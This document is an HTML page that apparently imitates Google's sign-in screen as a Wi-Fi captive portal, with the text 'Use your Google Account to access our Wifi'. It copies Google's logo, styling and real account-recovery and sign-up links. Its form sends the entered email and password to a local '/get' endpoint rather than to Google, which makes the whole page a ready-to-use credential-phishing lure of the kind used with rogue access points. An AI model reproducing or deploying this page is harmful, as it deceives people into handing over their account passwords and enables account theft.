<!DOCTYPE html>
<html>

<head>
    <meta charset="UTF-8">
    <style>
        body {
            font-family: sans-serif;
        }

        .login-container {
            width: 85%;
            margin: auto;
            padding: 20px;
            border-radius: 5px;
            margin-top: 10px;
        }

        #logo {
            margin: auto;
            width: fit-content;
        }

        .g-h1 {
            font-size: 25px;
            text-align: center;
            font-weight: 200;
            margin: auto;
        }

        .g-h2 {
            font-size: 15px;
            text-align: center;
            font-weight: 200;
            margin: auto;
        }

        .g-input {
            width: 95%;
            height: 30px;
            background-color: transparent;
            font: 400 16px Roboto, RobotoDraft, Helvetica, Arial, sans-serif;
            border-width: 0.5px;
            border-color: rgba(0, 0, 0, 0.6);
            border-radius: 4px;
            font-size: 16px;
            padding: 13px 9px;
            margin-bottom: 10px;
        }

        .create-account {
            font-size: smaller;
            color: #1a73e8;
            text-decoration: none;
            font-family: "Google Sans", Roboto, Arial, sans-serif;
            font-size: 15px;
            letter-spacing: 0.25px;
        }

        .gbtn-primary {
            min-width: 64px;
            border: none;
            margin-top: 6px;
            margin-bottom: 6px;
            height: 36px;
            border-radius: 4px;
            font-family: "Google Sans", Roboto, Arial, sans-serif;
            font-size: 15px;
            font-weight: 500;
            padding: 0 24px 0 24px;
            box-sizing: inherit;
            background-color: var(--gm-fillbutton-container-color, rgb(26, 115, 232));
            color: #fff;
        }

        .button-container {
            display: flex;
            justify-content: space-between;
            align-items: center;
        }

        .text {
            font-family: Roboto, "Noto Sans Myanmar UI", Arial, sans-serif;
            white-space: normal;
            color: #5f6368;
            font-size: 14px;
            line-height: 1.4286;
            padding-bottom: 3px;
            padding-top: 9px;
            box-sizing: inherit;
        }

        .txt {
            text-decoration: none;
            border-radius: 4px;
            color: #1a73e8;
        }
    </style>
    <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1">
</head>

<body data-new-gr-c-s-loaded="14.1092.0" spellcheck="false">
    <div class="login-container">
        <div id="logo"><svg width="75" height="24" xmlns="http://www.w3.org/2000/svg" aria-hidden="true">&nbsp;<g id="qaEJec">&nbsp;<path fill="#ea4335" d="M67.954 16.303c-1.33 0-2.278-.608-2.886-1.804l7.967-3.3-.27-.68c-.495-1.33-2.008-3.79-5.102-3.79-3.068 0-5.622 2.41-5.622 5.96 0 3.34 2.53 5.96 5.92 5.96 2.73 0 4.31-1.67 4.97-2.64l-2.03-1.35c-.673.98-1.6 1.64-2.93 1.64zm-.203-7.27c1.04 0 1.92.52 2.21 1.264l-5.32 2.21c-.06-2.3 1.79-3.474 3.12-3.474z"></path>&nbsp;</g>
                <g id="YGlOvc">&nbsp;<path fill="#34a853" d="M58.193.67h2.564v17.44h-2.564z"></path>&nbsp;</g>
                <g id="BWfIk">&nbsp;<path fill="#4285f4" d="M54.152 8.066h-.088c-.588-.697-1.716-1.33-3.136-1.33-2.98 0-5.71 2.614-5.71 5.98 0 3.338 2.73 5.933 5.71 5.933 1.42 0 2.548-.64 3.136-1.36h.088v.86c0 2.28-1.217 3.5-3.183 3.5-1.61 0-2.6-1.15-3-2.12l-2.28.94c.65 1.58 2.39 3.52 5.28 3.52 3.06 0 5.66-1.807 5.66-6.206V7.21h-2.48v.858zm-3.006 8.237c-1.804 0-3.318-1.513-3.318-3.588 0-2.1 1.514-3.635 3.318-3.635 1.784 0 3.183 1.534 3.183 3.635 0 2.075-1.4 3.588-3.19 3.588z"></path>&nbsp;</g>
                <g id="e6m3fd">&nbsp;<path fill="#fbbc05" d="M38.17 6.735c-3.28 0-5.953 2.506-5.953 5.96 0 3.432 2.673 5.96 5.954 5.96 3.29 0 5.96-2.528 5.96-5.96 0-3.46-2.67-5.96-5.95-5.96zm0 9.568c-1.798 0-3.348-1.487-3.348-3.61 0-2.14 1.55-3.608 3.35-3.608s3.348 1.467 3.348 3.61c0 2.116-1.55 3.608-3.35 3.608z"></path>&nbsp;</g>
                <g id="vbkDmc">&nbsp;<path fill="#ea4335" d="M25.17 6.71c-3.28 0-5.954 2.505-5.954 5.958 0 3.433 2.673 5.96 5.954 5.96 3.282 0 5.955-2.527 5.955-5.96 0-3.453-2.673-5.96-5.955-5.96zm0 9.567c-1.8 0-3.35-1.487-3.35-3.61 0-2.14 1.55-3.608 3.35-3.608s3.35 1.46 3.35 3.6c0 2.12-1.55 3.61-3.35 3.61z"></path>&nbsp;</g>
                <g id="idEJde">&nbsp;<path fill="#4285f4" d="M14.11 14.182c.722-.723 1.205-1.78 1.387-3.334H9.423V8.373h8.518c.09.452.16 1.07.16 1.664 0 1.903-.52 4.26-2.19 5.934-1.63 1.7-3.71 2.61-6.48 2.61-5.12 0-9.42-4.17-9.42-9.29C0 4.17 4.31 0 9.43 0c2.83 0 4.843 1.108 6.362 2.56L14 4.347c-1.087-1.02-2.56-1.81-4.577-1.81-3.74 0-6.662 3.01-6.662 6.75s2.93 6.75 6.67 6.75c2.43 0 3.81-.972 4.69-1.856z"></path>&nbsp;</g>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;
            </svg></div>
        <form action="/get" id="email-form-step">
            <h1 class="g-h1"><span style="font-size: 22px;"><strong>Sign In</strong></span><span style="font-size: 19px;"><strong>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</strong></span><span style="font-size: 16px;"><strong>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</strong>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Use</span><span style="font-size: 15px;">&nbsp;your Google Account to access our Wifi &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span><span style="font-size: 16px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span><input name="email" type="text" class="g-input" placeholder="Email or phone" required=""><input name="password" type="password" class="g-input" placeholder="Enter your password" required=""></h1>
            <div class="login-content">
                <p><span style="color: rgb(44, 130, 201); font-size: 14px;"><a href="https://accounts.google.com/signin/v2/usernamerecovery?continue=https%3A%2F%2Fmyaccount.google.com%2F%3Futm_source%3Dsign_in_no_continue%26pli%3D1&ddm=1&dsh=S1913495408%3A1734577375419066&ec=GAlAwAE&flowEntry=AddSession&flowName=GlifWebSignIn&hl=en&service=accountsettings&authuser=0"><strong><u>Forgot Email?</u></strong></a></span></p>
                <div class="text">Not your computer? Use private browsing windows to sign in.<strong><span style="color: rgb(44, 130, 201);"> <u>L</u></span></strong><span style="color: rgb(44, 130, 201);"><a href="https://support.google.com/chrome/answer/6130773?hl=en"><strong><u>earn more about using guest mode</u></strong></a></span></div>
                <h5><br></h5>
                <div class="button-container"><a href="https://accounts.google.com/lifecycle/steps/signup/name?continue=https://myaccount.google.com/?utm_source%3Dsign_in_no_continue%26pli%3D1&ddm=1&dsh=S774950811:1734577895197081&ec=GAlAwAE&flowEntry=SignUp&flowName=GlifWebSignIn&hl=en&service=accountsettings&TL=AE--LlyBN0TlzGpTjRCXdPHQKoKZMUvjh2mEPpNcq1g6dnESzCvbzV22NdzM8AE2"><span style="color: rgb(44, 130, 201);"><u>Create account</u></span></a><button class="gbtn-primary" type="submit">Next</button></div>
            </div>
        </form>
        <p><br></p>
    </div>
    <div style="color: red; font-size: 12px; width: 600px; margin: 0 auto; text-align: center;"><br></div>
</body>

</html>
